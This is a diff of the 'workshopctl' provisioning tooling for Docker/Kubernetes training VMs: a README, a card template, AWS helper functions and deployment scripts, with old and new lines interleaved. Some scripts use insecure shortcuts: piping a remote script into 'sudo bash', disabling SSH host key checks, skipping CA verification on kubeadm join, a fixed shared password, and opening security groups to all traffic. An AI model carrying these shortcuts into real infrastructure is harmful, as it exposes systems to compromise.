- `AWS_DEFAULT_REGION`
Make a copy of one of the example files in the `infra` directory.
If you're not using AWS, set these to placeholder values:
For instance:
```bash
cp infra/example.aws infra/aws-us-west-2
```
Edit your infrastructure file to customize it.
You will probably need to put your cloud provider credentials,
select region...
export AWS_ACCESS_KEY_ID="foo"
export AWS_SECRET_ACCESS_KEY="foo"
export AWS_DEFAULT_REGION="foo"
```
If you don't have the `aws` CLI installed, you will get a warning that it's a missing dependency. If you're not using AWS you can ignore this.
### Create your `settings` file
### Update/copy `settings/example.yaml`
Similarly, pick one of the files in `settings` and copy it
to customize it.
Then pass `settings/YOUR_WORKSHOP_NAME-settings.yaml` as an argument to `./workshopctl deploy`, `./workshopctl cards`, etc.
For instance:
```bash
cp settings/example.yaml settings/myworkshop.yaml
```
You're all set!
./workshopctl cards 2016-09-28-00-33-bret settings/orchestration.yaml
## `./workshopctl` Usage
@@ -90,7 +66,7 @@ Commands:
ami Show the AMI that will be used for deployment
amis List Ubuntu AMIs in the current region
build Build the Docker image to run this program in a container
cards Generate ready-to-print cards for a group of VMs
cards Generate ready-to-print cards for a batch of VMs
deploy Install Docker on a bunch of running VMs
ec2quotas Check our EC2 quotas (max instances)
help Show available commands
@@ -98,14 +74,14 @@ ids List the instance IDs belonging to a given tag or token
ips List the IP addresses of the VMs for a given tag or token
kube Setup kubernetes clusters with kubeadm (must be run AFTER deploy)
kubetest Check that all nodes are reporting as Ready
list List available groups in the current region
list List available batches in the current region
opensg Open the default security group to ALL ingress traffic
pull_images Pre-pull a bunch of Docker images
retag Apply a new tag to a group of VMs
start Start a group of VMs
status List instance status for a given group
retag Apply a new tag to a batch of VMs
start Start a batch of VMs
status List instance status for a given batch
stop Stop (terminate, shutdown, kill, remove, destroy...) instances
test Run tests (pre-flight checks) on a group of VMs
test Run tests (pre-flight checks) on a batch of VMs
wrap Run this program in a container
```
@@ -119,22 +95,22 @@ wrap Run this program in a container
- During `start` it will add your default local SSH key to all instances under the `ubuntu` user.
- During `deploy` it will create the `docker` user with password `training`, which is printed on the cards for students. This can be configured with the `docker_user_password` property in the settings file.
### Example Steps to Launch a group of AWS Instances for a Workshop
### Example Steps to Launch a Batch of AWS Instances for a Workshop
- Run `./workshopctl start --infra infra/aws-us-east-2 --settings settings/myworkshop.yaml --count 60` to create 60 EC2 instances
- Run `./workshopctl start N` to create `N` EC2 instances
- Your local SSH key will be synced to instances under `ubuntu` user
- AWS instances will be created and tagged based on date, and IPs stored in `prepare-vms/tags/`
- Run `./workshopctl deploy TAG` to run `lib/postprep.py` via parallel-ssh
- Run `./workshopctl deploy TAG settings/somefile.yaml` to run `lib/postprep.py` via parallel-ssh
- If it errors or times out, you should be able to rerun it (see the sketch after this list)
- Requires a good connection to run all the parallel SSH connections, up to 100 in parallel (ProTip: create a dedicated management instance in the same AWS region and run all these utilities from there)
- Run `./workshopctl pull_images TAG` to pre-pull a bunch of Docker images to the instances
- Run `./workshopctl cards TAG` to generate PDF/HTML files to print, cut up, and hand out to students
- Run `./workshopctl cards TAG settings/somefile.yaml` to generate PDF/HTML files to print, cut up, and hand out to students
- *Have a great workshop*
- Run `./workshopctl stop TAG` to terminate instances.
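If `deploy` fails partway through, it is safe to rerun it with the same tag. A quick way to inspect a batch first (the tag below is hypothetical; yours is printed by `start`):

```bash
TAG=2016-09-28-00-33-bret                           # hypothetical tag
./workshopctl status $TAG                           # instance states and reachability
cat tags/$TAG/ips.txt                               # IPs that will be targeted
./workshopctl deploy $TAG settings/myworkshop.yaml  # rerun after an error or timeout
```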
### Example Steps to Launch Azure Instances
- Install the [Azure CLI](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest) and authenticate with a valid account (`az login`)
- Install the [Azure CLI](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest) and authenticate with a valid account
- Customize `azuredeploy.parameters.json`
- Required:
- Provide the SSH public key you plan to use for instance configuration
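With the parameters file filled in, a plausible deployment sequence looks like this. The resource group name `workshop` matches the cleanup command shown below, but the template file name and the location are assumptions:

```bash
az group create --name workshop --location westeurope
az group deployment create \
    --resource-group workshop \
    --template-file azuredeploy.json \
    --parameters @azuredeploy.parameters.json
```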
@@ -179,16 +155,27 @@ az group delete --resource-group workshop
### Example Steps to Configure Instances from a non-AWS Source
- Copy `infra/example.generic` to `infra/generic`
- Run `./workshopctl start --infra infra/generic --settings settings/...yaml`
- Note the `prepare-vms/tags/TAG/` path that has been auto-created.
- Launch instances via your preferred method. You'll need to get the instance IPs and be able to SSH into them.
- Edit the file `prepare-vms/tags/TAG/ips.txt`, it should list the IP addresses of the VMs (one per line, without any comments or other info)
- Continue deployment of cluster configuration with `./workshopctl deploy TAG`
- Optionally, configure Kubernetes clusters of the size in the settings: `workshopctl kube TAG`
- Optionally, test your Kubernetes clusters. They may take a little time to become ready: `workshopctl kubetest TAG`
- Generate cards to print and hand out: `workshopctl cards TAG`
- Print the cards file: `prepare-vms/tags/TAG/ips.html`
- Launch instances via your preferred method. You'll need to get the instance IPs and be able to SSH into them.
- Set placeholder values for [AWS environment variable settings](#required-environment-variables).
- Choose a tag. It could be an event name, datestamp, etc. Ensure you have created a directory for your tag: `prepare-vms/tags/<tag>/`
- If you have not already generated a file with the IPs to be configured:
- The file should be named `prepare-vms/tags/<tag>/ips.txt`
- Format is one IP per line, no other info needed.
- Ensure the settings file is as desired (especially the number of nodes): `prepare-vms/settings/kube101.yaml`
- For a tag called `myworkshop`, configure instances: `workshopctl deploy myworkshop settings/kube101.yaml`
- Optionally, configure Kubernetes clusters of the size in the settings: `workshopctl kube myworkshop`
- Optionally, test your Kubernetes clusters. They may take a little time to become ready: `workshopctl kubetest myworkshop`
- Generate cards to print and hand out: `workshopctl cards myworkshop settings/kube101.yaml`
- Print the cards file: `prepare-vms/tags/myworkshop/ips.html`
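Putting the generic flow together, a minimal sketch (the tag and the addresses are placeholders):

```bash
mkdir -p tags/myworkshop
# One IP per line, nothing else
cat > tags/myworkshop/ips.txt <<EOF
203.0.113.10
203.0.113.11
203.0.113.12
EOF
./workshopctl deploy myworkshop settings/kube101.yaml
./workshopctl kube myworkshop
./workshopctl cards myworkshop settings/kube101.yaml
```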
## Other Tools
### Deploying your SSH key to all the machines
- Make sure that you have SSH keys loaded (`ssh-add -l`).
- Source `rc`.
- Run `pcopykey`.
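A minimal sketch, assuming you run this from `prepare-vms` with an `ips.txt` in place (the helpers operate on the IPs listed there):

```bash
ssh-add -l   # confirm at least one key is loaded
. rc         # load the helper functions (pssh, pcopykey, ...)
pcopykey     # copy your key to every machine in ips.txt
```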
## Even More Details
@@ -201,7 +188,7 @@ To see which local key will be uploaded, run `ssh-add -l | grep RSA`.
#### Instance + tag creation
The VMs will be started, with an automatically generated tag (timestamp + your username).
10 VMs will be started, with an automatically generated tag (timestamp + your username).
Your SSH key will be added to the `authorized_keys` of the ubuntu user.
@@ -209,11 +196,15 @@ Your SSH key will be added to the `authorized_keys` of the ubuntu user.
Following the creation of the VMs, a text file will be created containing a list of their IPs.
This ips.txt file will be created in the `tags/$TAG/` directory, and a symlink will be placed in the working directory of the script.
If you create new VMs, the symlinked file will be overwritten.
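For instance (the tag value is hypothetical; it is built from the timestamp plus your username, as in `make_tag`):

```bash
$ ls tags/
2016-09-28-00-33-bret
$ readlink ips.txt
tags/2016-09-28-00-33-bret/ips.txt
```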
#### Deployment
Instances can be deployed manually using the `deploy` command:
$ ./workshopctl deploy TAG
$ ./workshopctl deploy TAG settings/somefile.yaml
The `postprep.py` file will be copied via parallel-ssh to all of the VMs and executed.
@@ -223,7 +214,7 @@ The `postprep.py` file will be copied via parallel-ssh to all of the VMs and exe
#### Generate cards
$ ./workshopctl cards TAG
$ ./workshopctl cards TAG settings/somefile.yaml
If you want to generate both HTML and PDF cards, install [wkhtmltopdf](https://wkhtmltopdf.org/downloads.html); without that installed, only HTML cards will be generated.
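On Ubuntu, the repo's tools setup script installs it together with a virtual framebuffer:

```bash
sudo apt-get install -y wkhtmltopdf xvfb
```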
@@ -231,11 +222,13 @@ If you don't have `wkhtmltopdf` installed, you will get a warning that it is a m
#### List tags
$ ./workshopctl list infra/some-infra-file
$ ./workshopctl list
$ ./workshopctl listall
#### List VMs
$ ./workshopctl tags
$ ./workshopctl list TAG
This will print a human-friendly list containing some information about each instance.
#### Stop and destroy VMs

106
prepare-vms/cards.html Normal file
View File

@@ -0,0 +1,106 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://container.training/" -%}
{%- set pagesize = 12 -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine" -%}
{%- set this_or_each = "this" -%}
{%- set machine_is_or_machines_are = "machine is" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "orchestration workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "each" -%}
{%- set machine_is_or_machines_are = "machines are" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
{%- set image_src = image_src_swarm -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
body, table {
margin: 0;
padding: 0;
line-height: 1em;
font-size: 14px;
}
table {
border-spacing: 0;
margin-top: 0.4em;
margin-bottom: 0.4em;
border-left: 0.8em double grey;
padding-left: 0.4em;
}
div {
float: left;
border: 1px dotted black;
padding-top: 1%;
padding-bottom: 1%;
/* columns * (width+left+right) < 100% */
width: 21.5%;
padding-left: 1.5%;
padding-right: 1.5%;
}
p {
margin: 0.4em 0 0.4em 0;
}
img {
height: 4em;
float: right;
margin-right: -0.4em;
}
.logpass {
font-family: monospace;
font-weight: bold;
}
.pagebreak {
page-break-after: always;
clear: both;
display: block;
height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
{% if loop.index0>0 and loop.index0%pagesize==0 %}
<span class="pagebreak"></span>
{% endif %}
<div>
<p>
Here is the connection information to your very own
{{ cluster_or_machine }} for this {{ workshop_name }}.
You can connect to {{ this_or_each }} VM with any SSH client.
</p>
<p>
<img src="{{ image_src }}" />
<table>
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>
</p>
<p>
Your {{ machine_is_or_machines_are }}:
<table>
{% for node in cluster %}
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
{% endfor %}
</table>
</p>
<p>You can find the slides at:
<center>{{ url }}</center>
</p>
</div>
{% endfor %}
</body>
</html>

View File

Can't render this file because it contains an unexpected character in line 1 and column 42.

View File

@@ -7,6 +7,15 @@ fi
if id docker; then
sudo userdel -r docker
fi
sudo apt-get update -q
sudo apt-get install -qy jq python-pip wkhtmltopdf xvfb
pip install --user awscli jinja2 pdfkit pssh
pip install --user awscli jinja2 pdfkit
sudo apt-get install -y wkhtmltopdf xvfb
tmux new-session \; send-keys "
[ -f ~/.ssh/id_rsa ] || ssh-keygen
eval \$(ssh-agent)
ssh-add
Xvfb :0 &
export DISPLAY=:0
mkdir -p ~/www
sudo docker run -d -p 80:80 -v \$HOME/www:/usr/share/nginx/html nginx
"

View File

@@ -1,6 +0,0 @@
INFRACLASS=aws
# If you are using AWS to deploy, copy this file (e.g. to "aws", or "us-east-1")
# and customize the variables below.
export AWS_DEFAULT_REGION=us-east-1
export AWS_ACCESS_KEY_ID=AKI...
export AWS_SECRET_ACCESS_KEY=...

View File

@@ -1,2 +0,0 @@
INFRACLASS=generic
# This is for manual provisioning. No other variable or configuration is needed.

View File

@@ -1,9 +0,0 @@
INFRACLASS=openstack
# If you are using OpenStack, copy this file (e.g. to "openstack" or "enix")
# and customize the variables below.
export TF_VAR_user="jpetazzo"
export TF_VAR_tenant="training"
export TF_VAR_domain="Default"
export TF_VAR_password="..."
export TF_VAR_auth_url="https://api.r1.nxs.enix.io/v3"
export TF_VAR_flavor="GP1.S"

105
prepare-vms/lib/aws.sh Normal file
View File

@@ -0,0 +1,105 @@
aws_display_tags() {
# Print all "Name" tags in our region with their instance count
echo "[#] [Status] [Token] [Tag]" \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
aws ec2 describe-instances \
--query "Reservations[*].Instances[*].[State.Name,ClientToken,Tags[0].Value]" \
| tr -d "\r" \
| uniq -c \
| sort -k 3 \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
}
aws_get_tokens() {
aws ec2 describe-instances --output text \
--query 'Reservations[*].Instances[*].[ClientToken]' \
| sort -u
}
aws_display_instance_statuses_by_tag() {
TAG=$1
need_tag $TAG
IDS=$(aws ec2 describe-instances \
--filters "Name=tag:Name,Values=$TAG" \
--query "Reservations[*].Instances[*].InstanceId" | tr '\t' ' ')
aws ec2 describe-instance-status \
--instance-ids $IDS \
--query "InstanceStatuses[*].{ID:InstanceId,InstanceState:InstanceState.Name,InstanceStatus:InstanceStatus.Status,SystemStatus:SystemStatus.Status,Reachability:InstanceStatus.Status}" \
--output table
}
aws_display_instances_by_tag() {
TAG=$1
need_tag $TAG
result=$(aws ec2 describe-instances --output table \
--filter "Name=tag:Name,Values=$TAG" \
--query "Reservations[*].Instances[*].[ \
InstanceId, \
State.Name, \
Tags[0].Value, \
PublicIpAddress, \
InstanceType \
]"
)
if [[ -z $result ]]; then
die "No instances found with tag $TAG in region $AWS_DEFAULT_REGION."
else
echo "$result"
fi
}
aws_get_instance_ids_by_filter() {
FILTER=$1
aws ec2 describe-instances --filters $FILTER \
--query Reservations[*].Instances[*].InstanceId \
--output text | tr "\t" "\n" | tr -d "\r"
}
aws_get_instance_ids_by_client_token() {
TOKEN=$1
need_tag $TOKEN
aws_get_instance_ids_by_filter Name=client-token,Values=$TOKEN
}
aws_get_instance_ids_by_tag() {
TAG=$1
need_tag $TAG
aws_get_instance_ids_by_filter Name=tag:Name,Values=$TAG
}
aws_get_instance_ips_by_tag() {
TAG=$1
need_tag $TAG
aws ec2 describe-instances --filter "Name=tag:Name,Values=$TAG" \
--output text \
--query "Reservations[*].Instances[*].PublicIpAddress" \
| tr "\t" "\n" \
| sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 # sort IPs
}
aws_kill_instances_by_tag() {
TAG=$1
need_tag $TAG
IDS=$(aws_get_instance_ids_by_tag $TAG)
if [ -z "$IDS" ]; then
die "Invalid tag."
fi
info "Deleting instances with tag $TAG."
aws ec2 terminate-instances --instance-ids $IDS \
| grep ^TERMINATINGINSTANCES
info "Deleted instances with tag $TAG."
}
aws_tag_instances() {
OLD_TAG_OR_TOKEN=$1
NEW_TAG=$2
IDS=$(aws_get_instance_ids_by_client_token $OLD_TAG_OR_TOKEN)
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
IDS=$(aws_get_instance_ids_by_tag $OLD_TAG_OR_TOKEN)
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
}

View File

@@ -50,41 +50,27 @@ sep() {
fi
}
need_infra() {
if [ -z "$1" ]; then
die "Please specify infrastructure file. (e.g.: infra/aws)"
fi
if [ "$1" = "--infra" ]; then
die "The infrastructure file should be passed directly to this command. Remove '--infra' and try again."
fi
if [ ! -f "$1" ]; then
die "Infrastructure file $1 doesn't exist."
fi
. "$1"
. "lib/infra/$INFRACLASS.sh"
}
need_tag() {
if [ -z "$TAG" ]; then
if [ -z "$1" ]; then
die "Please specify a tag or token. To see available tags and tokens, run: $0 list"
fi
if [ ! -d "tags/$TAG" ]; then
die "Tag $TAG not found (directory tags/$TAG does not exist)."
fi
for FILE in settings.yaml ips.txt infra.sh; do
if [ ! -f "tags/$TAG/$FILE" ]; then
warning "File tags/$TAG/$FILE not found."
fi
done
. "tags/$TAG/infra.sh"
. "lib/infra/$INFRACLASS.sh"
}
need_settings() {
if [ -z "$1" ]; then
die "Please specify a settings file. (e.g.: settings/kube101.yaml)"
fi
if [ ! -f "$1" ]; then
die "Please specify a settings file."
elif [ ! -f "$1" ]; then
die "Settings file $1 doesn't exist."
fi
}
need_ips_file() {
IPS_FILE=$1
if [ -z "$IPS_FILE" ]; then
die "IPS_FILE not set."
fi
if [ ! -s "$IPS_FILE" ]; then
die "IPS_FILE $IPS_FILE not found. Please run: $0 ips <TAG>"
fi
}

View File

@@ -2,16 +2,26 @@ export AWS_DEFAULT_OUTPUT=text
HELP=""
_cmd() {
HELP="$(printf "%s\n%-20s %s\n" "$HELP" "$1" "$2")"
HELP="$(printf "%s\n%-12s %s\n" "$HELP" "$1" "$2")"
}
_cmd help "Show available commands"
_cmd_help() {
printf "$(basename $0) - the container training swiss army knife\n"
printf "$(basename $0) - the orchestration workshop swiss army knife\n"
printf "Commands:"
printf "%s" "$HELP" | sort
}
_cmd amis "List Ubuntu AMIs in the current region"
_cmd_amis() {
find_ubuntu_ami -r $AWS_DEFAULT_REGION "$@"
}
_cmd ami "Show the AMI that will be used for deployment"
_cmd_ami() {
find_ubuntu_ami -r $AWS_DEFAULT_REGION -a amd64 -v 16.04 -t hvm:ebs -N -q
}
_cmd build "Build the Docker image to run this program in a container"
_cmd_build() {
docker-compose build
@@ -22,62 +32,73 @@ _cmd_wrap() {
docker-compose run --rm workshopctl "$@"
}
_cmd cards "Generate ready-to-print cards for a group of VMs"
_cmd cards "Generate ready-to-print cards for a batch of VMs"
_cmd_cards() {
TAG=$1
need_tag
SETTINGS=$2
need_tag $TAG
need_settings $SETTINGS
# This will process ips.txt to generate two files: ips.pdf and ips.html
(
cd tags/$TAG
../../lib/ips-txt-to-html.py settings.yaml
)
# If you're not using AWS, populate the ips.txt file manually
if [ ! -f tags/$TAG/ips.txt ]; then
aws_get_instance_ips_by_tag $TAG >tags/$TAG/ips.txt
fi
# Remove symlinks to old cards
rm -f ips.html ips.pdf
# This will generate two files in the base dir: ips.pdf and ips.html
lib/ips-txt-to-html.py $SETTINGS
for f in ips.html ips.pdf; do
# Remove old versions of cards if they exist
rm -f tags/$TAG/$f
# Move the generated file and replace it with a symlink
mv -f $f tags/$TAG/$f && ln -s tags/$TAG/$f $f
done
info "Cards created. You can view them with:"
info "xdg-open tags/$TAG/ips.html tags/$TAG/ips.pdf (on Linux)"
info "open tags/$TAG/ips.html (on macOS)"
info "xdg-open ips.html ips.pdf (on Linux)"
info "open ips.html ips.pdf (on MacOS)"
}
_cmd deploy "Install Docker on a bunch of running VMs"
_cmd_deploy() {
TAG=$1
need_tag
SETTINGS=$2
need_tag $TAG
need_settings $SETTINGS
link_tag $TAG
count=$(wc -l < ips.txt)
# wait until all hosts are reachable before trying to deploy
info "Trying to reach $TAG instances..."
while ! tag_is_reachable; do
while ! tag_is_reachable $TAG; do
>/dev/stderr echo -n "."
sleep 2
done
>/dev/stderr echo ""
echo deploying > tags/$TAG/status
sep "Deploying tag $TAG"
# Wait for cloudinit to be done
pssh "
while [ ! -f /var/lib/cloud/instance/boot-finished ]; do
sleep 1
done"
# Copy settings and install Python YAML parser
pssh -I tee /tmp/settings.yaml <tags/$TAG/settings.yaml
pssh -I tee /tmp/settings.yaml <$SETTINGS
pssh "
sudo apt-get update &&
sudo apt-get install -y python-yaml"
sudo apt-get install -y python-setuptools &&
sudo easy_install pyyaml"
# Copy postprep.py to the remote machines, and execute it, feeding it the list of IP addresses
pssh -I tee /tmp/postprep.py <lib/postprep.py
pssh --timeout 900 --send-input "python /tmp/postprep.py >>/tmp/pp.out 2>>/tmp/pp.err" <tags/$TAG/ips.txt
pssh --timeout 900 --send-input "python /tmp/postprep.py >>/tmp/pp.out 2>>/tmp/pp.err" <ips.txt
# Install docker-prompt script
pssh -I sudo tee /usr/local/bin/docker-prompt <lib/docker-prompt
pssh sudo chmod +x /usr/local/bin/docker-prompt
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from the first node
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from node1
pssh "
sudo -u docker [ -f /home/docker/.ssh/id_rsa ] ||
ssh -o StrictHostKeyChecking=no \$(cat /etc/name_of_first_node) sudo -u docker tar -C /home/docker -cvf- .ssh |
ssh -o StrictHostKeyChecking=no node1 sudo -u docker tar -C /home/docker -cvf- .ssh |
sudo -u docker tar -C /home/docker -xf-"
# if 'docker@' doesn't appear in /home/docker/.ssh/authorized_keys, copy it there
@@ -86,78 +107,24 @@ _cmd_deploy() {
cat /home/docker/.ssh/id_rsa.pub |
sudo -u docker tee -a /home/docker/.ssh/authorized_keys"
# On the first node, create and deploy TLS certs using Docker Machine
# On node1, create and deploy TLS certs using Docker Machine
# (Currently disabled.)
true || pssh "
if i_am_first_node; then
grep '[0-9]\$' /etc/hosts |
if grep -q node1 /tmp/node; then
grep ' node' /etc/hosts |
xargs -n2 sudo -H -u docker \
docker-machine create -d generic --generic-ssh-user docker --generic-ip-address
fi"
sep "Deployed tag $TAG"
echo deployed > tags/$TAG/status
info "You may want to run one of the following commands:"
info "$0 kube $TAG"
info "$0 pull_images $TAG"
info "$0 cards $TAG"
}
_cmd disabledocker "Stop Docker Engine and don't restart it automatically"
_cmd_disabledocker() {
TAG=$1
need_tag
pssh "sudo systemctl disable docker.service"
pssh "sudo systemctl disable docker.socket"
pssh "sudo systemctl stop docker"
}
_cmd kubebins "Install Kubernetes and CNI binaries but don't start anything"
_cmd_kubebins() {
TAG=$1
need_tag
pssh --timeout 300 "
set -e
cd /usr/local/bin
if ! [ -x etcd ]; then
curl -L https://github.com/etcd-io/etcd/releases/download/v3.3.10/etcd-v3.3.10-linux-amd64.tar.gz \
| sudo tar --strip-components=1 --wildcards -zx '*/etcd' '*/etcdctl'
fi
if ! [ -x hyperkube ]; then
curl -L https://dl.k8s.io/v1.14.1/kubernetes-server-linux-amd64.tar.gz \
| sudo tar --strip-components=3 -zx kubernetes/server/bin/hyperkube
fi
if ! [ -x kubelet ]; then
for BINARY in kubectl kube-apiserver kube-scheduler kube-controller-manager kubelet kube-proxy;
do
sudo ln -s hyperkube \$BINARY
done
fi
sudo mkdir -p /opt/cni/bin
cd /opt/cni/bin
if ! [ -x bridge ]; then
curl -L https://github.com/containernetworking/plugins/releases/download/v0.7.5/cni-plugins-amd64-v0.7.5.tgz \
| sudo tar -zx
fi
"
info "$0 cards $TAG $SETTINGS"
}
_cmd kube "Setup kubernetes clusters with kubeadm (must be run AFTER deploy)"
_cmd_kube() {
TAG=$1
need_tag
# Optional version, e.g. 1.13.5
KUBEVERSION=$2
if [ "$KUBEVERSION" ]; then
EXTRA_KUBELET="=$KUBEVERSION-00"
EXTRA_KUBEADM="--kubernetes-version=v$KUBEVERSION"
else
EXTRA_KUBELET=""
EXTRA_KUBEADM=""
fi
# Install packages
pssh --timeout 200 "
@@ -167,19 +134,19 @@ _cmd_kube() {
sudo tee /etc/apt/sources.list.d/kubernetes.list"
pssh --timeout 200 "
sudo apt-get update -q &&
sudo apt-get install -qy kubelet$EXTRA_KUBELET kubeadm kubectl &&
sudo apt-get install -qy kubelet kubeadm kubectl
kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl"
# Initialize kube master
pssh --timeout 200 "
if i_am_first_node && [ ! -f /etc/kubernetes/admin.conf ]; then
kubeadm token generate > /tmp/token &&
sudo kubeadm init $EXTRA_KUBEADM --token \$(cat /tmp/token) --apiserver-cert-extra-sans \$(cat /tmp/ipv4)
if grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/admin.conf ]; then
kubeadm token generate > /tmp/token
sudo kubeadm init --token \$(cat /tmp/token)
fi"
# Put kubeconfig in ubuntu's and docker's accounts
pssh "
if i_am_first_node; then
if grep -q node1 /tmp/node; then
sudo mkdir -p \$HOME/.kube /home/docker/.kube &&
sudo cp /etc/kubernetes/admin.conf \$HOME/.kube/config &&
sudo cp /etc/kubernetes/admin.conf /home/docker/.kube/config &&
@@ -189,102 +156,53 @@ _cmd_kube() {
# Install weave as the pod network
pssh "
if i_am_first_node; then
kubever=\$(kubectl version | base64 | tr -d '\n') &&
if grep -q node1 /tmp/node; then
kubever=\$(kubectl version | base64 | tr -d '\n')
kubectl apply -f https://cloud.weave.works/k8s/net?k8s-version=\$kubever
fi"
# Join the other nodes to the cluster
pssh --timeout 200 "
if ! i_am_first_node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
FIRSTNODE=\$(cat /etc/name_of_first_node) &&
TOKEN=\$(ssh -o StrictHostKeyChecking=no \$FIRSTNODE cat /tmp/token) &&
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN \$FIRSTNODE:6443
if ! grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
TOKEN=\$(ssh -o StrictHostKeyChecking=no node1 cat /tmp/token)
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN node1:6443
fi"
# Install metrics server
pssh "
if i_am_first_node; then
kubectl apply -f https://raw.githubusercontent.com/jpetazzo/container.training/master/k8s/metrics-server.yaml
fi"
# Install kubectx and kubens
pssh "
[ -d kubectx ] || git clone https://github.com/ahmetb/kubectx &&
sudo ln -sf /home/ubuntu/kubectx/kubectx /usr/local/bin/kctx &&
sudo ln -sf /home/ubuntu/kubectx/kubens /usr/local/bin/kns &&
sudo cp /home/ubuntu/kubectx/completion/*.bash /etc/bash_completion.d &&
[ -d kube-ps1 ] || git clone https://github.com/jonmosco/kube-ps1 &&
sudo -u docker sed -i s/docker-prompt/kube_ps1/ /home/docker/.bashrc &&
sudo -u docker tee -a /home/docker/.bashrc <<EOF
. /home/ubuntu/kube-ps1/kube-ps1.sh
KUBE_PS1_PREFIX=""
KUBE_PS1_SUFFIX=""
KUBE_PS1_SYMBOL_ENABLE="false"
KUBE_PS1_CTX_COLOR="green"
KUBE_PS1_NS_COLOR="green"
EOF"
# Install stern
pssh "
if [ ! -x /usr/local/bin/stern ]; then
##VERSION##
sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.11.0/stern_linux_amd64 &&
sudo chmod +x /usr/local/bin/stern &&
sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.8.0/stern_linux_amd64
sudo chmod +x /usr/local/bin/stern
stern --completion bash | sudo tee /etc/bash_completion.d/stern
fi"
# Install helm
pssh "
if [ ! -x /usr/local/bin/helm ]; then
curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get | sudo bash &&
curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get | sudo bash
helm completion bash | sudo tee /etc/bash_completion.d/helm
fi"
# Install ship
pssh "
if [ ! -x /usr/local/bin/ship ]; then
curl -L https://github.com/replicatedhq/ship/releases/download/v0.40.0/ship_0.40.0_linux_amd64.tar.gz |
sudo tar -C /usr/local/bin -zx ship
fi"
# Install the AWS IAM authenticator
pssh "
if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
##VERSION##
sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
sudo chmod +x /usr/local/bin/aws-iam-authenticator
fi"
sep "Done"
}
_cmd kubereset "Wipe out Kubernetes configuration on all nodes"
_cmd_kubereset() {
TAG=$1
need_tag
pssh "sudo kubeadm reset --force"
}
_cmd kubetest "Check that all nodes are reporting as Ready"
_cmd kubetest "Check that all notes are reporting as Ready"
_cmd_kubetest() {
TAG=$1
need_tag
# There are way too many backslashes in the command below.
# Feel free to make that better ♥
pssh "
set -e
if i_am_first_node; then
[ -f /tmp/node ]
if grep -q node1 /tmp/node; then
which kubectl
for NODE in \$(awk /[0-9]\$/\ {print\ \\\$2} /etc/hosts); do
for NODE in \$(awk /\ node/\ {print\ \\\$2} /etc/hosts); do
echo \$NODE ; kubectl get nodes | grep -w \$NODE | grep -w Ready
done
fi"
}
_cmd ids "(FIXME) List the instance IDs belonging to a given tag or token"
_cmd ids "List the instance IDs belonging to a given tag or token"
_cmd_ids() {
TAG=$1
need_tag $TAG
@@ -297,289 +215,262 @@ _cmd_ids() {
aws_get_instance_ids_by_client_token $TAG
}
_cmd list "List available groups for a given infrastructure"
_cmd ips "List the IP addresses of the VMs for a given tag or token"
_cmd_ips() {
TAG=$1
need_tag $TAG
mkdir -p tags/$TAG
aws_get_instance_ips_by_tag $TAG | tee tags/$TAG/ips.txt
link_tag $TAG
}
_cmd list "List available batches in the current region"
_cmd_list() {
need_infra $1
infra_list
info "Listing batches in region $AWS_DEFAULT_REGION:"
aws_display_tags
}
_cmd listall "List VMs running on all configured infrastructures"
_cmd_listall() {
for infra in infra/*; do
case $infra in
infra/example.*)
;;
*)
info "Listing infrastructure $infra:"
need_infra $infra
infra_list
;;
esac
done
}
_cmd ping "Ping VMs in a given tag, to check that they have network access"
_cmd_ping() {
_cmd status "List instance status for a given batch"
_cmd_status() {
info "Using region $AWS_DEFAULT_REGION."
TAG=$1
need_tag
fping < tags/$TAG/ips.txt
}
_cmd netfix "Disable GRO and run a pinger job on the VMs"
_cmd_netfix () {
TAG=$1
need_tag
pssh "
sudo ethtool -K ens3 gro off
sudo tee /root/pinger.service <<EOF
[Unit]
Description=pinger
[Install]
WantedBy=multi-user.target
[Service]
WorkingDirectory=/
ExecStart=/bin/ping -w60 1.1
User=nobody
Group=nogroup
Restart=always
EOF
sudo systemctl enable /root/pinger.service
sudo systemctl start pinger"
need_tag $TAG
describe_tag $TAG
tag_is_reachable $TAG
info "You may be interested in running one of the following commands:"
info "$0 ips $TAG"
